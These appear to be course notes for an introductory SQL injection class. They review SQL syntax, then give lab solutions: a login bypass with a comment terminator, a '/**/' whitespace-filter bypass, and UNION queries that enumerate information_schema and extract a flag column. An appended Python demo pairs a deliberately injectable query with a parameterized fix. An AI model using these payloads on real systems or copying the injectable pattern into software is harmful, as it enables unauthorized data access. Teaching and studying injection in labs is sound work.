---
title: Basic SQLi
---

# Basic SQLi

by Chess

> [slides](https://slides.com/chesskuo/200826_sqli/fullscreen)
> [course video](https://youtu.be/HEYYIkkCJis)
> [slido anonymous questions](https://app.sli.do/event/rux28f3w/live/questions) (link closed)

:::info
- Please download this VM first (1.7G): bit.ly/sqli_vm
- VirtualBox also needs the extension pack installed, otherwise the VM will not start:
  VirtualBox 6.1.12 Oracle VM VirtualBox Extension Pack [download here](https://download.virtualbox.org/virtualbox/6.1.12/Oracle_VM_VirtualBox_Extension_Pack-6.1.12.vbox-extpack)
:::

## Build Environment

[vm](bit.ly/sqli_vm)

## What is SQL

- Structured Query Language

### How to use

- Create
- Read
- Update
- Delete

### Syntax

- SHOW
- CREATE
  - Creates a table or a database
  - ex.
    ```sql
    CREATE DATABASE <db_name>;
    CREATE TABLE <tb_name>(
        <col_name1> type,
        <col_name2> type
    );
    ```
- USE
  - Selects a database
  - You must USE a database before operating on its tables
  - ex. `USE <db_name>;`
- DROP
  - Deletes
  - ex. `DROP DATABASE <db_name>;`
- SELECT
  - Retrieves data
  - ex. `SELECT <col_name> FROM <tb_name>;`
- WHERE
  - Sets the filter condition
  - Can be combined with OR and AND
  - ex. `SELECT * FROM test WHERE id=100;`
- ORDER BY
  - ASC ascending (default)
  - DESC descending
  - ex. `SELECT * FROM people ORDER BY money DESC;` (the richest people come first)
- LIMIT
  - Limits the number of rows returned
  - ex. `SELECT * FROM <tb_name> LIMIT <from>,<n>`
- UNION
- INSERT
  - Inserts data into a table
  - ex. `INSERT INTO <tb_name> VALUES (<1>, ...);`
- DELETE
  - Deletes data
- UPDATE
  - Updates data
  - ex.
    ```sql
    UPDATE <tb_name>
    SET <col_name1> = <value>, ...
    WHERE <condition>;
    ```
- LIKE

### Type

#### Number

- INT (4 bytes)
- TINYINT (1 byte)
- SMALLINT (2 bytes)
- BIGINT (8 bytes)
- FLOAT
- DOUBLE

#### String

- CHAR
- VARCHAR

#### Date

- DATE
- TIME
- DATETIME
- TIMESTAMP

## What is SQLi

Deliberately piecing together SQL statements in order to extract information or attack the system.

## SQLi Labs

### sqli 01

```sql
admin')#
```

`#` can be replaced by `%23`

### sqli 02

- `/**/` can replace whitespace in SQL, so it bypasses the `preg_replace` filter
- The single quote at the end of the original query is used to close the `admin` string

```sql
'/**/or/**/username='admin
```

### sqli 03

- First guess how many columns there are; it turns out to be 4, and columns 2 and 3 appear in the output, so these two can be used to leak the required information

```sql
' union select 1,2,3,4#
```

- Next, leak which databases exist on the server

```sql
' union select 1,2,group_concat(schema_name),4 from information_schema.schemata#
```

- Find which tables are in the `labs` db

```sql
' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema='labs'#
```

- Find which columns are in the `users` table

```sql
' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema='labs' and table_name='users'#
```

- This reveals a `flag` column

```sql
' union select 1,2,group_concat(flag),4 from labs.users#
```

---

###### tags: `Enlightened` `NISRA` `2020`
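The sqli 02 point, that a filter which only strips whitespace is not a fix, is shown below as an added example that is not part of the original notes: a login query built by string concatenation behind a space-stripping filter (a stand-in for the lab's `preg_replace`), beside the same lookup with bound parameters. It assumes a constructed SQLite `users` table in place of the lab's MySQL `labs.users`; `/**/` is a comment in both dialects.

```python
import re
import sqlite3

# Constructed in-memory table standing in for the lab's `labs.users` (assumption).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT, flag TEXT)")
conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cret!', 'FLAG{constructed}')")
conn.execute("INSERT INTO users VALUES (2, 'guest', 'guest', NULL)")


def strip_spaces(value: str) -> str:
    """Assumed filter mimicking the lab's preg_replace: removes all whitespace."""
    return re.sub(r"\s+", "", value)


def login_vulnerable(username: str, password: str):
    """Query assembled from filtered input. The filter drops real spaces, but
    `/**/` is an SQL comment, so it still separates tokens and the injected
    `or username='admin'` becomes part of the WHERE clause."""
    query = (
        f"SELECT username FROM users WHERE username='{strip_spaces(username)}' "
        f"AND password='{strip_spaces(password)}'"
    )
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.Error:
        # A broken statement behaves like a failed login from the app's view.
        return None
    return row[0] if row else None


def login_parameterized(username: str, password: str):
    """Same lookup with bound parameters: the input is only ever compared as
    data, so the payload is matched literally against the password column."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "'/**/or/**/username='admin"          # the sqli 02 payload from the notes
    print(login_vulnerable("x", "' or username='admin"))  # None: spaces were stripped
    print(login_vulnerable("x", payload))              # admin: filter bypassed
    print(login_parameterized("x", payload))           # None
```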